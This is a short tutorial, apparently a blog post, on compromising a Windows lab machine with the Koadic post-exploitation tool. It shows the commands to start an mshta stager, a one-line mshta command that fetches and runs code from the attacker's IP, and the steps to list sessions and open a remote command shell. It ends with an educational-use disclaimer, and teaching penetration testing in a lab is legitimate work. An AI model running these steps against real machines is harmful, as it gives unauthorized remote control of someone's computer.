This article will walk you through the steps of using Koadic to access a Windows machine with a single click.
Koadic is a tool available on GitHub used in Windows post-exploitation rootkits, similar to other penetration testing tools such as Meterpreter and Powershell Empire.
- Attacker Machine (192.168.1.13)
- Victims Machine (192.168.1.5)
- Koadic Tool
Step 1: Let's start the process of gaining access to the Windows machine using Kali Linux.
Open the attacker machine, here we are using Kali Linux (192.168.1.13).
open the terminal and install koadic
GitHub - offsecginger/koadic: zerosum0x0's Koadic
implant/elevate/bypassuac_compdefaults Bypass UAC via registry hijack for ComputerDefaults.exe…
$ sudo apt install koadic
$ sudo koadic
now use command
(koadic: sta/js/mshta)# use stager/js/mshta
(koadic: sta/js/mshta)# info
here SRVHOST is the attacker machine’s Ip address
SRVPORT is the attacker machine’s port
and enter command
(koadic: sta/js/mshta)# run
Now you can see that you got an endpoint here
[>] mshta http://192.168.1.13:9999/9xD50
Step 2: Let's go to the Windows machine (Victims Machine)
Now simply open cmd on a windows machine
enter the endpoint which got in the attacker's machine and click on enter
and you are done.
Step 3: Checking the connection received in Attackers Machine
Now go to the attacker’s machine and you should see the below message “Zombi 0: Staging new connection (192.168.*.*) on Stager 0”
Now that you are on the victim's computer, all you need to do is explore his PC with some basic commands.
(koadic: sta/js/mshta)# zombies
It gives you the list of current sessions running with ID, IP address and Status.
now let’s start the command line in windows machine by using the command
(koadic: sta/js/mshta)# cmdshell 0
Here 0 is the ID of a session
Now use the windows command line commands
Now you are completely accessible to the victim machine.
Code samples are provided for educational purposes. Adequate defenses can only be built by researching the attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages resulting from the misuse of this information or code.